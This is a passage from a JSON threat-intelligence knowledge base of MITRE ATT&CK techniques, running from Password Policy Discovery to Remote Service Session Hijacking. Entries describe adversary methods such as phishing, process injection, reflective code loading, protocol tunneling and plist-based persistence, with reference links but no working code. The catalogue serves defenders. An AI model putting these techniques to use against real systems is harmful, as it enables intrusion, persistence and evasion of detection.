"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "2bf2e498-99c8-4e36-ad4b-e675d95ac925",
|
||
"value": "Password Policy Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.<sup>[[Peripheral Discovery Linux](https://app.tidalcyber.com/references/427b3a1b-88ea-4027-bae6-7fb45490b81d)]</sup><sup>[[Peripheral Discovery macOS](https://app.tidalcyber.com/references/2a3c5216-b153-4d89-b0b1-f32af3aa83d0)]</sup> Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0997d871-875e-41e4-891c-f8a4ed8b2f31",
|
||
"value": "Peripheral Device Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.<sup>[[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f9d61206-3063-4d04-b06f-225f4766bff1",
|
||
"value": "Permission Groups Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup> Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup> \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,<sup>[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)]</sup><sup>[[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)]</sup> or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872)).<sup>[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d4a36624-50cb-43d3-95af-a2e10878a533",
|
||
"value": "Phishing"
|
||
},
|
||
{
|
||
"description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.<sup>[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)]</sup><sup>[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)]</sup><sup>[[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)]</sup><sup>[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)]</sup><sup>[[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)]</sup> Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.<sup>[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]</sup>\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup> \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06",
|
||
"value": "Phishing for Information"
|
||
},
|
||
{
|
||
"description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.<sup>[[fileinfo plist file description](https://app.tidalcyber.com/references/24331b9d-68af-4db2-887f-3a984b6c5783)]</sup> \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://app.tidalcyber.com/technique/5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd)) or running additional commands for persistence (ex: [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)/[Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) or [Re-opened Applications](https://app.tidalcyber.com/technique/9459a27a-b892-4864-9916-814130bea485)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application’s <code>info.plist</code> file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as <code>LSEnvironment</code>, to enable persistence via [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759).<sup>[[wardle chp2 persistence](https://app.tidalcyber.com/references/3684bacb-24cb-4467-b463-d0d3f5075c5c)]</sup><sup>[[eset_osx_flashback](https://app.tidalcyber.com/references/ce6e5a21-0063-4356-a77a-5c5f9fd2cf5c)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"macOS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ee177ad0-d282-42c0-91f9-7bcf724e3d31",
|
||
"value": "Plist File Modification"
|
||
},
|
||
{
|
||
"description": "Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.<sup>[[Sleep, shut down, hibernate](https://app.tidalcyber.com/references/e9064801-0297-51d0-9089-db58f4811a9f)]</sup>\n\nAdversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.<sup>[[Microsoft: Powercfg command-line options](https://app.tidalcyber.com/references/d9b5be77-5e44-5786-a683-82642b8dd8c9)]</sup><sup>[[systemdsleep Linux](https://app.tidalcyber.com/references/9537f6f9-1521-5c21-b14f-ac459a2d1b70)]</sup>\n\nFor example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.<sup>[[Two New Monero Malware Attacks Target Windows and Android Users](https://app.tidalcyber.com/references/a797397b-2af7-58b9-b66a-5ded260659f0)]</sup> Adversaries may also extend system lock screen timeout settings.<sup>[[BATLOADER: The Evasive Downloader Malware](https://app.tidalcyber.com/references/53e12ade-99ed-51ee-b5c8-32180f144658)]</sup> Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.<sup>[[CoinLoader: A Sophisticated Malware Loader Campaign](https://app.tidalcyber.com/references/83469ab3-0199-5679-aa25-7b6885019552)]</sup>\n\nAware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.<sup>[[Condi-Botnet-binaries](https://app.tidalcyber.com/references/a92b0d6c-b3e8-56a4-b1b4-1d117e59db84)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0719ea2b-d630-5ada-9b04-c3136ff530ae",
|
||
"value": "Power Settings"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.<sup>[[Wikipedia Booting](https://app.tidalcyber.com/references/6d9c72cb-6cda-445e-89ea-7e695063d49a)]</sup>\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "33cd26b0-0248-4ee2-97a6-aab6a79824af",
|
||
"value": "Pre-OS Boot"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://app.tidalcyber.com/technique/710ae610-0556-44e5-9de9-8be6159a23dd) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility via [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or <code>Get-Process</code> via [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Information about processes can also be extracted from the output of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. \n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show processes` can be used to display current running processes.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[show_processes_cisco_cmd](https://app.tidalcyber.com/references/944e529b-5e8a-54a1-b205-71dcb7dd304f)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "710ae610-0556-44e5-9de9-8be6159a23dd",
|
||
"value": "Process Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "7a6208ac-c75e-4e73-8969-0aaf6085cb6e",
|
||
"value": "Process Injection"
|
||
},
|
||
{
|
||
"description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.<sup>[[SSH Tunneling](https://app.tidalcyber.com/references/13280f38-0f17-42d3-9f92-693f1da60ffa)]</sup> \n\n[Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) may also be abused by adversaries during [Dynamic Resolution](https://app.tidalcyber.com/technique/987ad3da-9423-4fe0-a52b-b931c0b8b95f). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.<sup>[[BleepingComp Godlua JUL19](https://app.tidalcyber.com/references/fd862d10-79bc-489d-a552-118014d01648)]</sup> \n\nAdversaries may also leverage [Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) in conjunction with [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or [Protocol Impersonation](https://app.tidalcyber.com/technique/eb15320a-cd24-45b2-b23f-05ef8daf1039) to further conceal C2 communications and infrastructure. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "bd677092-d197-4230-b94a-438cb24260fd",
|
||
"value": "Protocol Tunneling"
|
||
},
|
||
{
|
||
"description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ba6a869a-c870-4be6-bc08-e078f0efdc3b",
|
||
"value": "Proxy"
|
||
},
|
||
{
|
||
"description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.<sup>[[Wikipedia Windows Registry](https://app.tidalcyber.com/references/656f0ffd-33e0-40ef-bdf7-70758f855f18)]</sup> Information can easily be queried using the [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "58722f84-b119-45a8-8e29-0065688015ee",
|
||
"value": "Query Registry"
|
||
},
|
||
{
|
||
"description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://app.tidalcyber.com/technique/8941d1f4-d80c-4aaa-821a-a059c2a0f854)).\n\nReflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).<sup>[[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)]</sup><sup>[[S1 Custom Shellcode Tool](https://app.tidalcyber.com/references/f49bfd00-48d5-4d84-a7b7-cb23fcdf861b)]</sup><sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Mandiant BYOL](https://app.tidalcyber.com/references/445efe8b-659a-4023-afc7-aa7cd21ee5a1)]</sup> For example, the `Assembly.Load()` method executed by [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) may be abused to load raw code into the running process.<sup>[[Microsoft AssemblyLoad](https://app.tidalcyber.com/references/3d980d7a-7074-5812-9bb1-ca8e27e028bd)]</sup>\n\nReflective code injection is very similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.<sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Intezer ACBackdoor](https://app.tidalcyber.com/references/e6cb833f-cf18-498b-a233-848853423412)]</sup><sup>[[S1 Old Rat New Tricks](https://app.tidalcyber.com/references/20ef3645-fb92-4e13-a5a8-99367869bcba)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ef85800b-080d-4739-9f3b-91b61314a93e",
|
||
"value": "Reflective Code Loading"
|
||
},
|
||
{
|
||
"description": "An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.<sup>[[Symantec Living off the Land](https://app.tidalcyber.com/references/4bad4659-f501-4eb6-b3ca-0359e3ba824e)]</sup><sup>[[CrowdStrike 2015 Global Threat Report](https://app.tidalcyber.com/references/50d467da-286b-45f3-8d5a-e9d8632f7bf1)]</sup><sup>[[CrySyS Blog TeamSpy](https://app.tidalcyber.com/references/f21ea3e2-7983-44d2-b78f-80d84bbc4f52)]</sup>\n\nRemote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.\n \nAdversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.\n\nInstallation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).<sup>[[Google Chrome Remote Desktop](https://app.tidalcyber.com/references/70c87a07-38eb-53d2-8b63-013eb3ce62c8)]</sup><sup>[[Chrome Remote Desktop](https://app.tidalcyber.com/references/c1b2d0e9-2396-5080-aea3-58a99c027d20)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "acf828f4-7e7e-43e1-bf15-ceab42021430",
|
||
"value": "Remote Access Software"
|
||
},
|
||
{
|
||
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).<sup>[[SSH Secure Shell](https://app.tidalcyber.com/references/ac5fc103-1946-488b-8af5-eda0636cbdd0)]</sup><sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup> They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. \n\nLegitimate applications (such as [Software Deployment Tools](https://app.tidalcyber.com/technique/1bcf9fb5-6848-44d9-b394-ffbd3c357058) and other administrative programs) may utilize [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) to send the screen and control buffers and [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) for secure file transfer.<sup>[[Remote Management MDM macOS](https://app.tidalcyber.com/references/e5f59848-7014-487d-9bae-bed81af1b72b)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup><sup>[[Apple Remote Desktop Admin Guide 3.3](https://app.tidalcyber.com/references/c57c2bba-a398-4e68-b2a7-fddcf0740b61)]</sup> Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.<sup>[[FireEye 2019 Apple Remote Desktop](https://app.tidalcyber.com/references/bbc72952-988e-4c3c-ab5e-75b64e9e33f5)]</sup><sup>[[Lockboxx ARD 2019](https://app.tidalcyber.com/references/159f8495-5354-4b93-84cb-a25e56fcff3e)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "30ef3f13-5e9b-4712-9adf-f0da4ef157a1",
|
||
"value": "Remote Services"
|
||
},
|
||
{
|
||
"description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://app.tidalcyber.com/technique/c992f340-645d-412a-b509-3cbaf94919b0) differs from use of [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).<sup>[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)]</sup><sup>[[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c992f340-645d-412a-b509-3cbaf94919b0",
|
||
"value": "Remote Service Session Hijacking"
|
||
},
|
||
{
|
||
